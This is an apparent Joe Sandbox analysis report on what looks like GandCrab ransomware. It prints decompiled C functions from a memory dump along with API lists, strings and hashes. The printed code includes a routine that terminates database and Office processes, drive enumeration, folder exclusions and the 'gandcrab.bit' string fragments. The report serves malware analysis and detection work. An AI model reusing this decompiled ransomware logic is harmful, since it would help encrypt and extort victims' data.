				_t88 =  *(_t102 + 0x7c);
				 *((short*)(_t88 + _t56 * 2 - 2)) = 0;
				if( *(_t102 + 0x80) != 0) {
					_t58 = VirtualAlloc(0, 0x81, 0x3000, 4);
					 *(_t102 + 0x84) = _t58;
					if(_t58 == 0) {
						L13:
						 *(_t102 + 0x80) = 0;
					} else {
						_push(_t88);
						_t59 = E00D768F0(_t58);
						if(_t59 == 0) {
							VirtualFree( *(_t102 + 0x84), _t59, 0x8000);
							goto L13;
						}
					}
				}
				return 1;
			}

0x00d77369
0x00d77369
0x00d77369
0x00d77370
0x00d77375
0x00d77383
0x00d77388
0x00d7747b
0x00d77397
0x00d77399
0x00d773a4
0x00d773b2
0x00d773b6
0x00d773c0
0x00d773de
0x00d77479
0x00000000
0x00d773e4
0x00d77400
0x00d77403
0x00d77405
0x00d7740a
0x00d77416
0x00d77419
0x00d7741b
0x00d7741e
0x00d77427
0x00d77438
0x00d77446
0x00d77448
0x00d7745a
0x00d77462
0x00d7746d
0x00d7746d
0x00d773de
0x00d77484
0x00d77485
0x00d77488
0x00d77494
0x00d77496
0x00d7749b
0x00d774a7
0x00d774b7
0x00d774bd
0x00d774c5
0x00d774e4
0x00d774e4
0x00d774c7
0x00d774c7
0x00d774c9
0x00d774d0
0x00d774de
0x00000000
0x00d774de
0x00d774d0
0x00d774c5
0x00d774f9

APIs

GetDriveTypeW.KERNEL32(?), ref: 00D7737D
lstrcatW.KERNEL32(?,?), ref: 00D773A4
lstrcatW.KERNEL32(?,00D8073C), ref: 00D773B6
lstrcatW.KERNEL32(?,00D807B0), ref: 00D773C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00D74590), ref: 00D773D6
lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00D74590,00000000,?,00000000), ref: 00D7741E
wsprintfW.USER32 ref: 00D77438
lstrlenW.KERNEL32(?), ref: 00D77446
wsprintfW.USER32 ref: 00D7745A
lstrcatW.KERNEL32(?,00D807D0), ref: 00D7746D
lstrcatW.KERNEL32(?,00D807D4), ref: 00D77479
lstrlenW.KERNEL32(?), ref: 00D77494
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 00D774B7
VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 00D774DE

Strings

%I64u, xrefs: 00D77451
%I64u/, xrefs: 00D77432

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$FreeVirtualwsprintf$AllocDiskDriveSpaceType
String ID: %I64u$%I64u/
API String ID: 1496313530-2450085969
Opcode ID: b6a1c177b620731be3cc089ca003feb785fe32a1c530a83b4d7b11fdac486dc2
Instruction ID: a80f222148eac97c9bc569edb22d41dac37ef33930b4ef59710e711d8f6e18ac
Opcode Fuzzy Hash: b6a1c177b620731be3cc089ca003feb785fe32a1c530a83b4d7b11fdac486dc2
Instruction Fuzzy Hash: 0D414471900709AFDB21DBA4CC45FAEBBF9FF48304F104419E659E3260EA71E954DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00D74EB0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 84
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00D74EB0() {
				intOrPtr _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v72;
				WCHAR* _t26;
				long _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t41;
				void* _t46;
				signed int _t50;
				void* _t52;

				asm("movdqa xmm0, [0xd80960]");
				_v20 =  &_v72;
				_v16 =  &_v36;
				_v36 = 0x69736d65;
				_v32 = 0x74666f73;
				_v28 = 0x7469622e;
				_v24 = 0;
				asm("movdqu [ebp-0x44], xmm0");
				_v56 = 0;
				_v52 = 0x646e6167;
				_v48 = 0x62617263;
				_v44 = 0x7469622e;
				_v40 = 0;
				_v12 =  &_v52;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t38 = _t26;
				if(_t38 != 0) {
					_t40 = 0;
					_t50 = 0;
					while(1) {
						_v8 =  *((intOrPtr*)(_t52 + _t50 * 4 - 0x10));
						_t50 =  ==  ? 0 : _t50 + 1;
						if(_t40 == 0xffffffff) {
							Sleep(0x2710);
						}
						_t46 = VirtualAlloc(0, 2 + lstrlenW(_t38) * 2, 0x3000, 4);
						_t41 = _t46;
						E00D74D60(_t41, _v8);
						_t33 = lstrcmpiA(_t46, "fabian wosar <3");
						if(_t33 != 0) {
							break;
						}
						VirtualFree(_t46, _t33, 0x8000);
						_t40 = _t41 | 0xffffffff;
					}
					wsprintfW(_t38, L"%S", _t46);
					VirtualFree(_t46, 0, 0x8000);
					_t26 = _t38;
				}
				return _t26;
			}

0x00d74eb6
0x00d74ecc
0x00d74ed7
0x00d74ee4
0x00d74eeb
0x00d74ef2
0x00d74ef9
0x00d74efd
0x00d74f02
0x00d74f06
0x00d74f0d
0x00d74f14
0x00d74f1b
0x00d74f1f
0x00d74f22
0x00d74f24
0x00d74f28
0x00d74f2e
0x00d74f30
0x00d74f32
0x00d74f37
0x00d74f3f
0x00d74f45
0x00d74f4c
0x00d74f4c
0x00d74f6f
0x00d74f71
0x00d74f73
0x00d74f7e
0x00d74f86
0x00000000
0x00000000
0x00d74f8f
0x00d74f9b
0x00d74f9b
0x00d74fa7
0x00d74fb8
0x00d74fbe
0x00d74fbe
0x00d74fc6

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74656980,00000000,00000000), ref: 00D74F22
Sleep.KERNEL32(00002710), ref: 00D74F4C
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00D74F5A
VirtualAlloc.KERNEL32(00000000,00000000), ref: 00D74F6A
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00D74F7E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D74F8F
wsprintfW.USER32 ref: 00D74FA7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D74FB8

Strings

emsi, xrefs: 00D74EE4
crab, xrefs: 00D74F0D
.bit, xrefs: 00D74F14
gand, xrefs: 00D74F06
fabian wosar <3, xrefs: 00D74F78
soft, xrefs: 00D74EEB
.bit, xrefs: 00D74EF2

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$.bit$crab$emsi$fabian wosar <3$gand$soft
API String ID: 2709691373-1090818981
Opcode ID: f6bf983817d12fb18c72b93df80618fc05e6d8e79e5a2b761bc5c376a0cb025e
Instruction ID: 6e729ee92fc2161882564e1bbb1de3b5fff4e1461a5cfbf915c1c22eaf98215a
Opcode Fuzzy Hash: f6bf983817d12fb18c72b93df80618fc05e6d8e79e5a2b761bc5c376a0cb025e
Instruction Fuzzy Hash: 7131B672A04309ABDB11DFA4AD96BAEFBB8FF44710F504129FA05F72C0E77059058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D76110 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 109
memoryCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00D76110(void* __ecx) {
				void* _t9;
				intOrPtr* _t20;
				void* _t42;
				void* _t45;

				_t42 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E00D77BA0(_t42, L"\\ProgramData\\") != 0 || E00D77BA0(_t42, L"\\Program Files\\") != 0 || E00D77BA0(_t42, L"\\Tor Browser\\") != 0 || E00D77BA0(_t42, L"Ransomware") != 0 || E00D77BA0(_t42, L"\\All Users\\") != 0) {
					L15:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t9 = E00D77BA0(_t42, L"\\Local Settings\\");
					if(_t9 != 0) {
						goto L15;
					} else {
						_t20 = __imp__SHGetSpecialFolderPathW;
						_push(_t9);
						_push(0x2a);
						_push(_t45);
						_push(_t9);
						if( *_t20() == 0 || E00D77BA0(_t42, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t20() == 0 || E00D77BA0(_t42, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t20() == 0 || E00D77BA0(_t42, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t20() == 0 || E00D77BA0(_t42, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L15;
									}
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						} else {
							goto L15;
						}
					}
				}
			}

0x00d76121
0x00d76130
0x00d76139
0x00d76228
0x00d76231
0x00d7623c
0x00d7618f
0x00d76196
0x00d7619d
0x00000000
0x00d761a3
0x00d761a3
0x00d761a9
0x00d761aa
0x00d761ac
0x00d761ad
0x00d761b2
0x00d761c1
0x00d761c3
0x00d761c5
0x00d761c6
0x00d761cc
0x00d761db
0x00d761dd
0x00d761df
0x00d761e0
0x00d761e6
0x00d761f5
0x00d761f7
0x00d761f9
0x00d761fa
0x00d76200
0x00d7621c
0x00d76227
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d761b2
0x00d7619d

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00D76706,00000000,?,?), ref: 00D76123
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00D76706,00000000,?,?), ref: 00D761AE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00D76706,00000000,?,?), ref: 00D761C8
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00D76706,00000000,?,?), ref: 00D761E2
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00D76706,00000000,?,?), ref: 00D761FC
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00D76706,00000000,?,?), ref: 00D7621C
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00D76706,00000000,?,?), ref: 00D76231

Strings

\ProgramData\, xrefs: 00D76129
\Local Settings\, xrefs: 00D7618F
Ransomware, xrefs: 00D76167
\Tor Browser\, xrefs: 00D76153
\Program Files\, xrefs: 00D7613F
\All Users\, xrefs: 00D7617B

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
API String ID: 1363212851-106008693
Opcode ID: 4cee6196ec3cb649fd54953bdbb195534084a9dceedbec50b08aae6612c6b7f1
Instruction ID: 14ec71d2ffcf56fb60412439e1d140dbe2b0288e17db46c128f1c9e1678ae69a
Opcode Fuzzy Hash: 4cee6196ec3cb649fd54953bdbb195534084a9dceedbec50b08aae6612c6b7f1
Instruction Fuzzy Hash: 7A21312174071227EA6035762C6AB7F098ECFD5751F998421BE09EA2C2FE94CC054375

Uniqueness

Uniqueness Score: -1.00%

Function 00D76BA0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00D76BA0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x00d76ba0
0x00d76ba8
0x00d76baa
0x00d76bae
0x00d76bb3
0x00d76bc1
0x00d76bc4
0x00d76bc9
0x00d76bc9
0x00d76bcf
0x00d76bd9
0x00d76be0
0x00d76be4
0x00d76be7
0x00d76be7
0x00d76bed
0x00d76bfb
0x00d76bfd
0x00d76c05
0x00d76c08
0x00d76c08
0x00d76c0e
0x00d76c1c
0x00d76c1e
0x00d76c26
0x00d76c29
0x00d76c29
0x00d76c2f
0x00d76c3d
0x00d76c3f
0x00d76c47
0x00d76c4a
0x00d76c4a
0x00d76c50
0x00d76c5e
0x00d76c60
0x00d76c68
0x00d76c6b
0x00d76c6b
0x00d76c71
0x00d76c7f
0x00d76c81
0x00d76c89
0x00d76c8c
0x00d76c8c
0x00d76c92
0x00d76ca0
0x00d76ca2
0x00d76caa
0x00d76cad
0x00d76cad
0x00d76cb3
0x00d76cb5
0x00d76cb5
0x00d76cbc
0x00d76cca
0x00d76ccc
0x00d76cd4
0x00d76cd7
0x00d76cd7
0x00d76ce0
0x00d76d0c
0x00d76ce2
0x00d76ce8
0x00d76d06
0x00d76d06

APIs

lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76BF2
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76BFD
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C13
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C1E
lstrlenW.KERNEL32(00D748B6,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C34
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C3F
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C55
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C60
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C76
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C81
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C97
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CA2
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CC1
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CCC
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CE8
lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CF6

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: a1478c30381a75a92715259310cfcbedb7b4f76b920826372564a5777a47a98f
Instruction ID: 971f5421358775674201b17766925266d4db5a62dcfba2d3a3cd3277abebde07
Opcode Fuzzy Hash: a1478c30381a75a92715259310cfcbedb7b4f76b920826372564a5777a47a98f
Instruction Fuzzy Hash: 4541F972110B51AFC7125FA8DD98B94FBB2FF04315B084529E45AC2A20F775E8B8DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D74640 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00D74640() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				int _t51;
				int _t52;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t70 = CreateToolhelp32Snapshot(2, 0);
				_v172 = _t70;
				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70);
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000);
				}
				return CloseHandle(_t72);
			}

0x00d74646
0x00d74653
0x00d7465b
0x00d74663
0x00d7466b
0x00d74673
0x00d7467b
0x00d74683
0x00d7468b
0x00d74693
0x00d7469b
0x00d746a3
0x00d746ab
0x00d746b3
0x00d746bb
0x00d746c3
0x00d746cb
0x00d746d3
0x00d746db
0x00d746e3
0x00d746eb
0x00d746f3
0x00d746fb
0x00d74703
0x00d7470b
0x00d74713
0x00d7471b
0x00d74723
0x00d7472e
0x00d74739
0x00d74744
0x00d7474f
0x00d7475a
0x00d74765
0x00d74770
0x00d7477b
0x00d74786
0x00d74791
0x00d7479c
0x00d747a7
0x00d747c4
0x00d747c8
0x00d747d2
0x00d747d6
0x00d747d8
0x00d747e1
0x00d747e3
0x00d747e5
0x00d747e5
0x00d747e1
0x00d747f1
0x00d747f1
0x00d747f4
0x00d747f4
0x00d74800
0x00d74805
0x00d7480d
0x00d7481b
0x00d7481f
0x00d74824
0x00d74831
0x00d74831
0x00d7481f
0x00d7483b
0x00d7483c
0x00d7483c
0x00d7483f
0x00d74844
0x00d7484a
0x00d74850
0x00d74850
0x00d74853
0x00d74859
0x00d74863
0x00d74863
0x00d74872

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00D747B2
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 00D747CC
Process32FirstW.KERNEL32(00000000,00000000), ref: 00D747E5
lstrcmpiW.KERNEL32(00000002,00000024), ref: 00D74805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D74815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00D74824
CloseHandle.KERNEL32(00000000), ref: 00D74831
Process32NextW.KERNEL32(?,00000000), ref: 00D7484A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D74863
CloseHandle.KERNEL32(?), ref: 00D7486A

Strings

iet, xrefs: 00D74805

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: iet
API String ID: 3586910739-2308090442
Opcode ID: 754d3e3126df7d5b39476337d1be0059b3838f8fc8952d45d1c7c81df41fc1b9
Instruction ID: 972112b5e86382cdb9e5e23802f2c4ebe2b7b1c61ed5853fecea79f5f3df0383
Opcode Fuzzy Hash: 754d3e3126df7d5b39476337d1be0059b3838f8fc8952d45d1c7c81df41fc1b9
Instruction Fuzzy Hash: 5F5138B11083849FD7208F119849B5FBBE4AB9A71CF90899CE59C9A350F7B08409CFB7

Uniqueness

Uniqueness Score: -1.00%

Function 00D75270 Relevance: 18.1, APIs: 12, Instructions: 92
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D75270(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}

0x00d75287
0x00d7528f
0x00d75299
0x00d7529c
0x00d752bb
0x00d752bd
0x00d752c3
0x00d752d4
0x00d752da
0x00d752df
0x00d752ea
0x00d752f0
0x00d752f5
0x00d752f7
0x00d752f7
0x00d752fb
0x00d752fe
0x00d75305
0x00d75307
0x00d75312
0x00d75314
0x00d75316
0x00d75319
0x00d75323
0x00d7531b
0x00d7531b
0x00d7531d
0x00d7531e
0x00d7531e
0x00d75328
0x00d75329
0x00d7532f
0x00d75334
0x00d75316
0x00d7533b
0x00d75341
0x00d75344
0x00d75344
0x00d7534a
0x00d7534a
0x00d75351
0x00d75351
0x00d7536b

APIs

VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,746981D0,00000000,?,?,?,?,00D75482), ref: 00D75289
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,00D75482), ref: 00D7529C
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00D75482), ref: 00D752B5
